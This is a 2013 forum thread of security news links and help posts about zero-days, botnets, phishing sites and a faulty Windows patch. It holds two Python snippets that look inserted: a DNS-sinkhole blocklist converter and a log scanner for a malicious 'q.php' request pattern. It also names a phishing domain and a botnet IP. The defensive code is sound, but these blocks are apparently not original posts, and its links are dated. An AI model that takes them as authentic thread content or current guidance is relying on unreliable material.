Damian
-
That means it's not vulnerable.
Correct
-
Hi craigb,
Does it help I am behind SoftPerfect Wifi Guard?
polonus
-
Thank you, Marc57 for the heads-up on this,
Damian
You're welcome. Does that run on your system or on the router?
-
Just answer this one, I do not like to go too far off-topic on what is originally CharleyO's thread. Hope he will forgive me. This Wifi Guard tool checks from the OS every 30 minutes...router, modem and comp against being compromised..
polonus
-
Thank you, Marc57 for the heads-up on this,
Damian
You're welcome. Does that run on your system or on the router?
+1 Thank you, Marc57. Also no response here. Bookmarked this link, as unaware grc had this.
-
There are folks that ridicule Gibson as a security researcher, but I always held him in high esteem for what he reports and brought us,
polonus
-
There are folks that ridicule Gibson as a security researcher, but I always held him in high esteem for what he reports and brought us,
polonus
Actually, it may be the folksy writing style that some may not like.
He offers free tools such as UPnP, DCOMbobulator, etc., and I could not have set up my system the way it is without his help.
-
Thank you, Marc57 for the heads-up on this,
Damian
You're welcome. Does that run on your system or on the router?
+1 Thank you, Marc57. Also no response here. Bookmarked this link, as unaware grc had this.
You're welcome. This is something new that Steve put together in the last couple of weeks. I've been a fan of Steve's since I started watching Security Now several years ago.
-
Hi craigb,
Does it help I am behind SoftPerfect Wifi Guard?
polonus
As far as I know SoftPerfect Wifi Guard is only a program that detects/notifies you about new connections, it shouldn't have any effect on the test whether you have Wifi Guard or not.
-
New zero-day in Adobe Reader actively being abused: http://blog.fireeye.com/research/2013/02/in-turn-its-pdf-time.html (link article author FireEye's Yichong Lin)
polonus
-
New zero-day in Adobe Reader actively being abused: http://blog.fireeye.com/research/2013/02/in-turn-its-pdf-time.html (link article author FireEye's Yichong Lin)
Confirmed by Adobe: http://blogs.adobe.com/psirt/2013/02/adobe-reader-and-acrobat-vulnerability-report.html
-
Newest trend: malware injected into JavaScript on legit websites.
http://nakedsecurity.sophos.com/2013/02/13/malware-javascript/ (link article author Paul Baccas)
polonus
-
New zero-day in Adobe Reader actively being abused: http://blog.fireeye.com/research/2013/02/in-turn-its-pdf-time.html (link article author FireEye's Yichong Lin)
polonus
Thanks P-man
-
Google faces new privacy concerns over Android app market
http://www.rawstory.com/rs/2013/02/13/google-faces-new-privacy-concerns-over-app-market/
http://phetdreams.tumblr.com/post/42959902001/massive-google-play-privacy-issue
-
New zero-day in Adobe Reader actively being abused: http://blog.fireeye.com/research/2013/02/in-turn-its-pdf-time.html (link article author FireEye's Yichong Lin)
Confirmed by Adobe: http://blogs.adobe.com/psirt/2013/02/adobe-reader-and-acrobat-vulnerability-report.html
-> http://www.adobe.com/support/security/advisories/apsa13-02.html
-
Hi Marc57,
Another nice one from Gibson: http://www.grc.com/dns/benchmark.htm
pol
-
Lots of router vulnerabilities, not many patches
http://www.h-online.com/security/news/item/Lots-of-router-vulnerabilities-not-many-patches-1800471.html
More Wi-Fi devices with security holes
http://www.h-online.com/security/news/item/More-Wi-Fi-devices-with-security-holes-1805115.html
-
USB worm recognizes VM: http://blogs.mcafee.com/mcafee-labs/polymorphic-autorun-worm-evolves-and-obfuscates (link article author - McAfee's Sanchit Karve)
polonus
-
American SSL-certificate company DigiCert issued 70 digital certificates to malcreants: http://www.welivesecurity.com/2013/02/21/code-certificate-laissez-faire-banking-trojans/ (link article author = ESET's Stephen Cobb)
polonus
-
NBC Website HACKED – Be Careful Surfing
http://blog.sucuri.net/2013/02/nbc-website-hacked-be-careful-surfing.html
-
Beware! Identity thieves are targeting your tax refund (http://www.infoworld.com/t/identity-management/beware-identity-thieves-are-targeting-your-tax-refund-212915)
"Victims often don't find out their IDs have been stolen until their legitimate returns are rejected.
Straightening out those tax records can be a significant administrative hassle -- this is the IRS,
after all. Acting IRS Commissioner Steven T. Miller said last month that taxpayers whose IDs
have been stolen often must wait months to get their rightful refunds."
-
Recent Cyberattacks [MS]
http://blogs.technet.com/b/msrc/archive/2013/02/22/recent-cyberattacks.aspx
-
Recent Cyberattacks [MS]
http://blogs.technet.com/b/msrc/archive/2013/02/22/recent-cyberattacks.aspx
You see any description of the exact method and symptoms of these attacks? Java code?
I had heard that some of the attacks were keystroke loggers planted through emails to unsuspecting employees.
-
Recent Cyberattacks [MS]
http://blogs.technet.com/b/msrc/archive/2013/02/22/recent-cyberattacks.aspx
You see any description of the exact method and symptoms of these attacks? Java code?
I had heard that some of the attacks were keystroke loggers planted through emails to unsuspecting employees.
Here is some of the NBC info:
http://malwaretips.com/Thread-NBC-com-hacked-serving-up-Citadel-malware
-
Again new Java 7 holes found, issues 54 and 55 (should be combined for a functional exploit):
http://www.security-explorations.com/en/SE-2012-01-poc.html
credits go to Adam Gowdiak
polonus
-
Again new Java 7 holes found, issues 54 and 55 (should be combined for a functional exploit):
http://www.security-explorations.com/en/SE-2012-01-poc.html
credits go to Adam Gowdiak
polonus
Also see: http://news.softpedia.com/news/Zero-Day-Vulnerability-Affecting-Java-7-Update-15-and-Earlier-Versions-Identified-332157.shtml
-
Update on the Bit9 security incident (SQL attack combined with a java exploit): https://blog.bit9.com/2013/02/25/bit9-security-incident-update/
(link article author = Harry Sverdlove)
polonus
-
Iran Fights Off New Attack From Enemy Hackers
http://www.redorbit.com/news/technology/1112754098/iran-fights-off-enemy-hackers-122612/
-
Sneaky Joomla Web Malware alert: http://www.viruss.eu/web-malware/sneaky-joomla-web-malware-javascript-infections/ (link article author = antivirus robot)
Cleaning up info: http://sucuri.net/cleaning-up-an-infected-joomla-web-site.html
polonus
-
Open door: Oracle's JRE, something has to change: http://www.f-secure.com/weblog/archives/00002511.html (link article author = sean)
polonus
-
Open door: Oracle's JRE, something has to change...
Couldn't agree more..!! They continue to dig their own (Java) grave...
-
YAJ0: Yet Another Java Zero-Day
http://blog.fireeye.com/research/2013/02/yaj0-yet-another-java-zero-day-2.html
-
For those concerned and our forum's qualified removers,
Added free removal tool for old school MiniDuke malcode: http://download.bitdefender.com/removal_tools/
Download link: http://download.bitdefender.com/removal_tools/MiniDuke_Removal_Unified.exe
polonus
-
EVERNOTE hacked
Security Notice: Service-wide Password Reset
http://evernote.com/corp/news/password_reset.php
-
For Mac and Windows alike: http://www.intego.com/mac-security-blog/intego-discovers-a-new-multi-platform-minecraft-password-stealer/
(link article author = Lisa Myers)
polonus
-
Mr Adam Gowdiak comes up with 5 new holes in Oracle's Java; the software starts to look like the proverbial Swiss cheese now, see: http://www.security-explorations.com/en/SE-2012-01-status.html
Oracle provides tracking numbers for Issues 56-60, claims they are still not confirmed.
polonus
-
Multi-browser heap spray attack now added to metasploit: https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/
(link article author = Peter Van Eeckhoutte, security researcher)
polonus
-
Already dangerous to keep this in production - PHP version 5.2.17
Read: http://forums.cpanel.net/f185/already-dangerous-keeping-php-5-2-17-production-267442.html
link thread poster = kevin levin
Webmasters should always update and upgrade....
polonus
-
Targeted attack dismantled just in time: http://blog.seculert.com/2013/03/the-chinese-time-bomb.html (blog article poster = Seculert)
polonus
-
Microsoft Security Bulletin Advance Notification for March 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-mar
-
Kelihos Botnet Stronger than Ever after a vain attempt to bring it down, analysis: http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/kelihos-botnet-gains-strength-again-0 (link article author = alexander adamov)
See this on one of the encrypted IPs: http://urlquery.net/report.php?id=1028057
with ET CURRENT_EVENTS Suspicious double HTTP Header possible botnet CnC, see: http://doc.emergingthreats.net/bin/view/Main/2012707
and ET INFO EXE Download With Content Type Specified As Empty -> http://comments.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/15732 (link posting author = Will Metcalf)
Another example: http://urlquery.net/report.php?id=1305759
See how this IP could not be verified: http://dnsbl.inps.de/query.cgi?lang=en&action=check&ip=62.84.252.23&quick=0 and here this would not resolve: 404report.projecthoneypot.org/ip_62.84.252.23
but it is listed as a zombie here: http://support.clean-mx.de/clean-mx/publog.php?as=AS35362
62.84.252.23 | SD Bad Event 67 2013-01-03 2013-01-18 Spam Server Dictionary Attacker.
So it is an endless task to get these sinkholed, and then another division of zombies comes into play... Rather interesting info here: http://pastebin.com/NfA4pvpg linked to http://www.fireeye.com/blog/files/cagremub.ru_ips and consider the info here: https://github.com/CybOXProject/Tools/blob/master/scripts/snort_to_cybox/example/botnet-cnc.rules (GitHub info)
polonus
-
Threat: localStorage bug allows sites to fill up hard disk
Browser makers should be aware of HTML-5 hardware bomb: -http://feross.org/fill-disk/ (link article author = Feross Aboukhadijeh )
Firefox not vulnerable...Chrome might crash totally before the HD is full...
polonus
-
US-CERT warns of HP LaserJet printer backdoor
http://www.h-online.com/security/news/item/US-CERT-warns-of-HP-LaserJet-printer-backdoor-1821334.html
-
Microsoft changes default Flash behavior in Windows 8 and RT (http://www.zdnet.com/microsoft-changes-default-flash-behavior-in-windows-8-and-rt-7000012418/?s_cid=e589)
"Summary: In a surprise reversal, Microsoft has changed the default behavior of Flash content on websites
viewed using Internet Explorer in Windows 8 or Windows RT. Previously, sites had to be on a whitelist before Flash would work.
The new behavior effectively turns the Compatibility View list into an exclusive blacklist of badly behaved sites."
-
Posting an up-to-date (March 15, 2013) listing of security vulnerabilities from Symantec Security Focus: http://www.securityfocus.com/
Most have to do with Adobe and Java; just updated Adobe Flash to the latest version only two days ago.
-
Bootloader threat: http://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/
(link article author = Aleksandr Matrosov) See: https://www.virustotal.com/nl/file/c874509c80dbacf92fde4f18f05fb19d625e2d5eea3bf0db7e2ca37e25048174/analysis/ avast detects!
polonus
-
Third-Party Applications to Blame for 87 Percent of Vulnerabilities Last Year
http://www.majorgeeks.com/story.php?id=38077
-
Ramnit Malware Back and Better at Avoiding Detection (https://threatpost.com/en_us/blogs/ramnit-malware-back-and-better-avoiding-detection-031513)
"This time around, Ramnit has grown up with its latest iteration boasting four new upgrades,
all bolstered by rootkit functionality that hides other components of the Ramnit from security software."
-
Huawei 3G/4G USB sticks put users' security at risk
http://www.h-online.com/security/news/item/Huawei-3G-4G-USB-sticks-put-users-security-at-risk-1823894.html
-
40.000.000 users at risk from hole in EA Origin: http://revuln.com/files/ReVuln_EA_Origin_Insecurity.pdf (link article authors = Luigi Auriemma & Donato Ferrante)
pol
-
40.000.000 users at risk from hole in EA Origin: http://revuln.com/files/ReVuln_EA_Origin_Insecurity.pdf (link article authors = Luigi Auriemma & Donato Ferrante)
pol
I wasn't at risk last night because I was playing Battlefield 3 off-line just me and my bloody super lappy ;)
-
Discovered botnet steals 6.000.000 dollar from websites through click fraud: http://www.spider.io/blog/2013/03/chameleon-botnet/ (link article source = spider.io) Worst offenders in this botnet are listed in this blacklist here: http://www.spider.io/wp-content/uploads/2013/03/ChameleonIPs.txt
polonus
-
40.000.000 users at risk from hole in EA Origin: http://revuln.com/files/ReVuln_EA_Origin_Insecurity.pdf (link article authors = Luigi Auriemma & Donato Ferrante)
pol
Just remember STEAM has a similar/same vulnerability; this brings the number of vulnerable gamers to over 100 million.
http://revuln.com/files/ReVuln_Steam_Browser_Protocol_Insecurity.pdf
-
Latest malicious iFrames and malicious redirects reported and shared by eVulnLabs: http://evuln.com/labs/
polonus
-
Malcreants like to use anonymity via anonymous proxies (hacked PCs), read http://blog.webroot.com/2013/03/20/hacked-pcs-as-anonymization-stepping-stones-service-operates-in-the-open-since-2004/ (link article author = Dancho Danchev) Example of such proxies: -http://www.proxybridge.com/anonymous-proxy/ (serviced by Dutch Leaseweb)
polonus
-
Sad news, but true - One in twenty home PCs are malware infested:
http://eugene.kaspersky.com/2013/03/25/one-in-twenty-is-the-sad-truth/ (link article author = eugene kaspersky)
these results are based on 25.000 scans via Kaspersky's free scanner: http://www.kaspersky.com/security-scan
Even PCs with an av-solution installed were also infested with malware...
polonus
-
Sad news, but true - One in twenty home PCs are malware infested:
http://eugene.kaspersky.com/2013/03/25/one-in-twenty-is-the-sad-truth/ (link article author = eugene kaspersky)
these results are based on 25.000 scans via Kaspersky's free scanner: http://www.kaspersky.com/security-scan
Even PCs with an av-solution installed were also infested with malware...
polonus
Since no AV is 100% effective, I venture to say that some of those infected computers are protected by Kaspersky. ;D
-
Hi bob3160,
That could even be a natural fact. You know why this info is out there - statistical propaganda to promote their product - but the numbers are not encouraging.
Conclusion even more users have to make the switch to avast!
polonus
-
Conclusion even more users have to make the switch to avast!
polonus
That's why Bob the Builder is doing a bloody great job by getting more and more people to trust Avast, so who else is going to do the job like Bob the Builder and who are you gonna trust?..........Avast or somebody else ;)
-
Hi SpeedyPC,
You know my position - avast! is a "darned" good product and it is getting better every day...
and well bob3160 seems to have converted quite a contingent of fine users in the States to make that final switch to the avast! av solution..
pol
-
Are zero days taken seriously? Re: http://www.zerodayinitiative.com/advisories/upcoming/ (reported by DVLabs)
The end of upcoming Java zero days is not in sight...
polonus
-
Are zero days taken seriously? Re: http://www.zerodayinitiative.com/advisories/upcoming/ (reported by DVLabs)
The end of upcoming Java zero days is not in sight...
polonus
Zero Day is another reason why in my opinion, the new feature in avast! to keep your program up-to date
is a good idea. If used properly, new updates which patched a recent exploit will get updated on the users
computer. Even in the free version of avast!
-
Are zero days taken seriously? Re: http://www.zerodayinitiative.com/advisories/upcoming/ (reported by DVLabs)
The end of upcoming Java zero days is not in sight...
polonus
Sandbox will be an answer, wouldn't it?
-
Hi Tech,
Good suggestion i.m.h.o.,
pol
-
Are zero days taken seriously? Re: http://www.zerodayinitiative.com/advisories/upcoming/ (reported by DVLabs)
The end of upcoming Java zero days is not in sight...
polonus
Sandbox will be an answer, wouldn't it?
Absolutely correct. Any malware downloaded to your system will remain inside the sandbox where it can do no harm. Once the sandbox is deleted, all contents within vanish, and the threat(s) is/are removed. Some malware will not run within a sandbox if it detects it is inside one, so one will get additional protection from that as well.
Tracking cookies vanish too when the sandbox is deleted.
If java jre is not needed, best to uninstall it from your system.
-
If java jre is not needed, best to uninstall it from your system.
We need it for online banking in my country :'(
-
If java jre is not needed, best to uninstall it from your system.
We need it for online banking in my country :'(
**Sigh**
Problem is, most users of computer systems are not advanced/expert users and thus not really aware of the dangers of using such sites. Until Oracle fixes all zero-days, or introduces a new cross-platform jre variant specifically for banker use, then the task of maintaining one's own IT support can be daunting at best, and victimize innocent users at worst. Convenience does not outweigh security in this case.
-
@Tech,
At least you could always update to the latest java version. Pre-scan links where you wanna go to avoid java based exploits (kits) landing sites.
Use NoScript and RequestPolicy extensions in the firefox browser to prevent malscripts from running and third party requests being met.
Have the avast shields up and running. Only enable java in the browser when you need it, else do not allow it...
polonus
-
If java jre is not needed, best to uninstall it from your system.
We need it for online banking in my country :'(
Me too Tech :'( :'( you're not alone buddy and you still have to keep an eye out what you're doing with online banking so you don't get robbed :o
-
Boring Malware Sneaks By Antivirus Sandboxing (http://securitywatch.pcmag.com/security/309602-boring-malware-sneaks-by-antivirus-sandboxing)
-
Very hot phishing attack on Facebook users originally posted by Carol @ c|net Spyware, viruses, & security forum: NEWS - March 26, 2013.
Direct link to article report: http://www.scambook.com/blog/2013/03/facebook-security-alert-www-wasvideo-com-hacks-your-account-spams-your-friends/
Urlquery report: http://urlquery.net/report.php?id=1653452 Note the source origination point and screenshot of website. Screenshot of website is identical to the https Facebook version.
Urlvoid report: http://www.urlvoid.com/scan/fizikubook.com/
Sucuri report: http://sitecheck.sucuri.net/results/www.fizikubook.com/indexv2.php
VirusTotal url scan report: https://www.virustotal.com/en/url/cb2a916e6d5f226ce65a22e56266248d8fe03592c104d11c83caefe784cbc49b/analysis/1364462131/
zulu zscaler report: Not available as this site is currently number 45 in queue.
Firefox does block this site as a reported web forgery.
Under no circumstance visit this hxxp://www.fizubook.com directly.
-
Let us hope malcreants do not find out about this spamming technique abuse of Google services in combination with an URL/shortener....
: https://www.barracuda.com//blogs/labsblog?bid=3130 (article author = Dave Michmerhuizen)
Do not use them; check links before you click (for security reasons). Enter shortened links into a URL expander like
http://longurl.org/ or http://www.clybs.com/urlexpander
polonus
-
Let us hope malcreants do not find out about this spamming technique abuse of Google services in combination with an URL/shortener....
: https://www.barracuda.com//blogs/labsblog?bid=3130 (article author = Dave Michmerhuizen)
Do not use them; check links before you click (for security reasons). Enter shortened links into a URL expander like
http://longurl.org/ or http://www.clybs.com/urlexpander
polonus
This doesn't have anything to do with URL shortening but links embedded in translated websites. :)
I use https://goo.gl a lot of times.
Here is just one of them:
http://goo.gl/VLXde
Certainly not dangerous. :)
-
@ Bob
What is dangerous is the fact that the user has no way of identifying where the link leads to without clicking on the link. So there is an element of blind trust when using URL shortening methods.
I already use Long URL Mobile Expander add-on in FF, but it doesn't cover all or goo.gl being one such instance.
@ polonus
The 2nd link urlexpander, isn't as convenient as the Long URL Mobile Expander add-on as it appears to be on-line only - there is also a problem on the site any shortened url entered results in an application error. So not very good.
-
@ Bob
What is dangerous is the fact that the user has no way of identifying where the link leads to without clicking on the link. So there is an element of blind trust when using URL shortening methods.
I already use Long URL Mobile Expander add-on in FF, but it doesn't cover all or goo.gl being one such instance.
@ polonus
The 2nd link urlexpander, isn't as convenient as the Long URL Mobile Expander add-on as it appears to be on-line only - there is also a problem on the site any shortened url entered results in an application error. So not very good.
Google also checks the links it shortens for possible infections. :) One of the reasons I use their service and not any of the others.
More information available at:
http://support.google.com/websearch/bin/answer.py?hl=en&answer=190768
-
I just don't trust what I can't make an informed decision about and as for google checking the content, google searches, in particular image searches are rife with malware redirections (lots of instances seen in the forums). So excuse me if I don't trust google when it comes to cleaning their house.
-
I just don't trust what I can't make an informed decision about and as for google checking the content, google searches, in particular image searches are rife with malware redirections (lots of instances seen in the forums). So excuse me if I don't trust google when it comes to cleaning their house.
I don't pass along other people's shortened links but, it's certainly easier to post the following:
http://goo.gl/VLXde
Instead of:
https://docs.google.com/document/d/1TCCX0R7AAF2WOxAMQ_kcun2nNnCPFAk2P4RBzFXSgds/edit
Since I know these are safe, the short link makes it easier for everyone.
Yes, you need to have some trust in the person who is passing this shortened link to you. :)
-
Yes its shorter, but so is A Google link (https://docs.google.com/document/d/1TCCX0R7AAF2WOxAMQ_kcun2nNnCPFAk2P4RBzFXSgds/edit) and from that you can hover over the link and see where it leads.
-
And what if you're using a mobile device? One cannot hover over the link, so would the average user know the difference between the two?
People of my age group tend to disregard the url completely, possibly because there are no "preview urls" featured in mobile devices.
~!Donovan
-
@DavidR,
Thanks for the additional info and the good advice. On Google Chrome browser I use Long URL extension: https://chrome.google.com/webstore/detail/longurl/oldnehmjgfcannmkgkojafngdkhfkdpd
LongURL will replace shortened links using LongURL API This works fine for me,
@~!Donovan, you could use this also in your case as an app: https://play.google.com/store/apps/details?id=com.tseng.longurlexp&hl=nl
pol
-
So conclusion here is to always use an expander for short URLs both on conventional comps and smartphones,
pol
-
Hi malware sites that should fill the DNS sinkhole: http://www.malware-domains.com/
All files located here: http://www.malware-domains.com/files/
polonus
-
At least folks, do you hold these "immortals" blocked?
Immortals are long outstanding malware launching domains,
domains with a long lasting and continued history of spreading malcode,
or with the so-called "Long OVERDUE status".
An IDS list for them can be found here: http://www.autoshun.org/downloads/immortal_bhdns.rules
Or download the immortal_domains file from here: http://www.malware-domains.com/files/immortal_domains.zip
enjoy,
polonus
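To actually feed such a list into a DNS sinkhole, here is an added example in Python (my own, not a file or tool from malware-domains.com or autoshun.org) that normalises a domain list and emits dnsmasq and BIND RPZ-style entries pointing the blocked names at an unroutable address. The list format (one domain per line, '#' comments) and the sample domains are constructed assumptions; the real files are not shown on this page.

```python
import re

# Constructed sample list (not real data). The real malware-domains.com file format is
# not shown on the page, so one domain per line with '#' comments is assumed here.
SAMPLE_LIST = """\
# constructed example blocklist
evil-example.test
Evil-Example.test   # duplicate differing only in case
  tracker.bad-example.test
not a domain!
sub.another-example.test
"""

# Sinkhole target: blocked names resolve to an address that cannot be routed to
SINKHOLE_IP = "0.0.0.0"

# Conservative hostname syntax: labels of letters/digits/hyphens, at least one dot
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
DOMAIN_RE = re.compile(rf"^(?:{_LABEL}\.)+{_LABEL}$")


def parse_domains(text):
    """Return (sorted de-duplicated valid domains, rejected raw lines).

    Comments are stripped, names are lower-cased so case variants collapse into
    one entry, and anything that is not a plausible hostname is reported rather
    than silently written into the resolver config.
    """
    seen, rejected = set(), []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip().lower()
        if not line:
            continue
        if DOMAIN_RE.match(line):
            seen.add(line)
        else:
            rejected.append(raw.strip())
    return sorted(seen), rejected


def dnsmasq_lines(domains, sink=SINKHOLE_IP):
    """dnsmasq 'address=' entries; each one also covers all subdomains of the name."""
    return [f"address=/{d}/{sink}" for d in domains]


def rpz_lines(domains, sink=SINKHOLE_IP):
    """BIND response policy zone records: the name and its wildcard both answer with the sink."""
    out = []
    for d in domains:
        out.append(f"{d} IN A {sink}")
        out.append(f"*.{d} IN A {sink}")
    return out


if __name__ == "__main__":
    domains, rejected = parse_domains(SAMPLE_LIST)
    print("# dnsmasq")
    print("\n".join(dnsmasq_lines(domains)))
    print("# rpz")
    print("\n".join(rpz_lines(domains)))
    for bad in rejected:
        print(f"# rejected: {bad!r}")
```

Review the rejected lines before deploying: a list that contains garbage usually means its format changed upstream, and a resolver that swallows the whole list will not tell you.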
-
IP/hex/q.php hacks -> http://arstechnica.com/security/2013/04/exclusive-ongoing-malware-attack-targeting-apache-hijacks-20000-sites/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+arstechnica%2Ftechnology-lab+(Ars+Technica%3A+Technology+Lab)
Link article author: Aurich Lawson / Thinkstock
From the PHP manual to understand the attack better: http://php.net/manual/en/function.ip2long.php
The initial way the hack was performed is as yet not quite clear....
polonus
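For anyone going through their own Apache access logs after reading the Ars piece, here is an added example (my own Python, not code from the article or from the thread) that flags requests whose path has the /<8 hex digits>/q.php shape named in the thread title and decodes the hex back to a dotted IP, the inverse of PHP's ip2long() followed by dechex(). The log lines are constructed, and the path pattern is an assumption taken from the thread title; the real campaign's URL shape may differ.

```python
import re
import ipaddress

# Constructed Apache-style access log lines (not real traffic)
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2013:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2013:10:01:09 +0000] "GET /c0a80001/q.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2013:10:01:10 +0000] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Apr/2013:10:02:33 +0000] "GET /7f000001/q.php HTTP/1.1" 302 0 "-" "curl/7.29"
"""

# Common log format: client, identity, user, [timestamp], "METHOD path PROTO", status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumed path shape from the thread title: an IPv4 address as 8 hex digits, then q.php
HEX_IP_PATH_RE = re.compile(r"^/(?P<hex>[0-9a-fA-F]{8})/q\.php$")


def hex_to_ip(hex8):
    """Inverse of PHP dechex(ip2long(ip)): 8 hex digits -> dotted-quad IPv4 string."""
    return str(ipaddress.IPv4Address(int(hex8, 16)))


def ip_to_hex(ip):
    """PHP-style dechex(ip2long(ip)), zero-padded to 8 digits."""
    return f"{int(ipaddress.IPv4Address(ip)):08x}"


def find_hex_ip_requests(log_text):
    """Return (client, timestamp, path, decoded_ip) for each request matching the suspicious shape."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        p = HEX_IP_PATH_RE.match(m.group("path"))
        if p:
            hits.append((m.group("client"), m.group("ts"), m.group("path"),
                         hex_to_ip(p.group("hex"))))
    return hits


if __name__ == "__main__":
    for client, ts, path, decoded in find_hex_ip_requests(SAMPLE_LOG):
        print(f"{ts} {client} requested {path} -> encoded address {decoded}")
```

The decoded address is often the visitor's own IP echoed back into the URL, which is why comparing it with the client column of the same line is a cheap way to tell this pattern apart from an unrelated path that happens to be eight hex digits long.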
-
Microsoft Security Bulletin Advance Notification for April 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-apr
-
Nasty Trojan infects 100 hosts in sixty minutes
http://news.drweb.com/show/?i=3437&lng=en&c=14
http://vms.drweb.com/virus/?i=2019633
Win32:Kryptik-LFQ [Trj] - Avast users are protected
http://r.virscan.org/f95b06ee9a21bee660538ebcbdefcc53
http://r.virscan.org/12d2b7dce9809d51345920cb3d6c205e
-
Banking Trojan Carberp: An Epitaph?
https://blog.avast.com/2013/04/08/carberp_epitaph/
-
KB2839011 Released to Address Security Bulletin Update Issue
http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx
http://support.microsoft.com/kb/2839011
-
KB2839011 Released to Address Security Bulletin Update Issue
http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx
http://support.microsoft.com/kb/2839011
There are some reports that TrendMicro is also affected by this security update issue.
-
KB2839011 Released to Address Security Bulletin Update Issue
http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx
http://support.microsoft.com/kb/2839011
There are some reports that TrendMicro is also affected by this security update issue.
I wonder if there is any correlation between this update and the problem some of the avast! customers have had ???
-
You may be onto something here Bob as the last driver loaded is the Avast one and after that it just stops
-
Microsoft pulls Patch Tuesday security fix – (http://www.zdnet.com/microsoft-pulls-patch-tuesday-security-fix-7000013942/)
Microsoft recommends that users uninstall the patch, and warns that another issue with the security update may cause anti-virus programs to cease to work correctly.
The Redmond giant says that Kaspersky Anti-Virus for Windows Workstations and Kaspersky Anti-Virus for Windows Servers versions 6.0.4.1424 and 6.0.4.1611
may display an error message stating that licenses for the products are not valid, and so the software will cease to function.
The question still remains:
Has this also affected the avast! users that have flooded the forum with problems since this MS update ???
Are those problems an avast! problem or, a problem caused by MS and Avast is getting the blame as did Kaspersky ???
-
Hi bob3160,
Excellent find,
polonus
-
I'm going to need this as it looks like it has bricked my win7 netbook, not boot just black screen. Now the right royal pain in the rear starts. With no optical drive, I have to investigate bootable USB to see if I can get in and remove it.
-
Bootable USB .. That must be my department David... To install the recovery console, no need for FRST just use the recovery console ISO to get you to the command prompt
Download the following three programmes to your desktop :
1. Rufus (http://rufus.akeo.ie/downloads/rufus_v1.3.2.exe)
For 64bit systems
2. Windows 8 64bit RC (https://dl.dropbox.com/u/73555776/64win8RC.iso)
2. Windows Vista 64bit RC (https://dl.dropbox.com/u/73555776/Vista%2064bit%20rc.iso)
2. Windows 7 64bit RC (https://dl.dropbox.com/u/73555776/win7%2064bit%20rc.iso)
3. Farbar Recovery Scan Tool x64 (http://download.bleepingcomputer.com/farbar/FRST64.exe)
For 32bit systems
2. Windows Vista RC (https://dl.dropbox.com/u/73555776/vista32%20rc.iso)
2. Windows 7 RC (https://dl.dropbox.com/u/73555776/win7-32bit%20rc.iso)
3. Farbar Recovery Scan Tool (http://download.bleepingcomputer.com/farbar/FRST.exe)
Insert the USB stick Then run Rufus
(https://dl.dropbox.com/u/73555776/rufus.JPG)
Select the ISO file on the desktop via the ISO icon.
Press Start Burn
(https://dl.dropbox.com/u/73555776/RufusISO.JPG)
Then copy FRST to the same USB
(http://dl.dropbox.com/u/73555776/frstwintoboot.JPG)
Insert the USB into the sick computer and start the computer. First ensuring that the system is set to boot from USB
Note: If you are not sure how to do that follow the instructions Here (http://lifehacker.com/5991848/how-to-boot-from-a-cd-or-usb-drive-on-any-pc)
When you reboot you will see this although yours will say windows 7.
Click repair my computer
(http://i1224.photobucket.com/albums/ee362/Essexboy3/RepairVista_7275.jpg)
Select your operating system
(http://i1224.photobucket.com/albums/ee362/Essexboy3/RepairVista_7277202.jpg)
Select Command prompt
(http://i1224.photobucket.com/albums/ee362/Essexboy3/RepairVista_7277.jpg)
At the command prompt type the following :
dism /image:C:\ /get-packages
Then follow the MS details
-
Do these have to be on the desktop, to be used ?
-
Yes download on another system to create the bootable USB
Then boot the recalcitrant computer with the USB
-
Wonder if this helps David:
"Pray tell, how do you uninstall a patch that keeps Windows from starting up?"
Answer:
Uninstall:
wusa.exe /uninstall /kb:2823324 /quiet /norestart
If you can get to Safe mode,
Restart by using the F8 key. Select Repair your Computer. Select a restore point prior to the update.
-
Yes download on another system to create the bootable USB
Then boot the recalcitrant computer with the USB
Sorry by desktop, I wasn't saying my desktop PC, but the physical desktop location, I save all downloads to a specific folder.
My question was poorly framed, can I run them from any location, if I save them to my downloads folder rather than the desktop (I presume this would be correct) ?
Just been toying with booting my netbook and I can't intercept the boot to go into safe mode (F8) - also tried F12 for "Press F12 to Choose Boot Device" - also tried pecking away at the DEL key and none of those got any sort of response, so this may well be something other than this KB issue.
Hard to tell if the drive is actually spinning (I can hear the fan running, which would mask the drive activity), but no drive light activity. Perhaps this could be a coincidental hard drive failure ?
- Acer Aspire One, Win7 Starter (32bit), 2GB DDR3 RAM, Intel Atom N255 (1.5GHz dual core) CPU.
@ Bob
Yes I say that in the comments in the link you gave, but it goes further later that that can't be used in isolation like that.
Whoops...
Should have read your question better....
Restart by using the F8 key.
Select Repair your Computer.
Select the language, and then log on to the computer.
Note If you do not know the local password, you must start by using a Windows 7 DVD or USB bootable media. Then, access System Recovery Options.
Select System Restore from the menu:
You'd then restore to a date before the patches that were installed on Tuesday.
Plus this may be moot if this is a hard drive failure.
-
David,
can you boot your netbook into regular mode ???
If you can, then you can always start msconfig from the run command and from there select to reboot into safe mode.
-
No, as I mentioned it is just a black screen.
This is growing and way off topic here, so it may be best if I start a new topic.
EDIT: New Topic, http://forum.avast.com/index.php?topic=121216.0
-
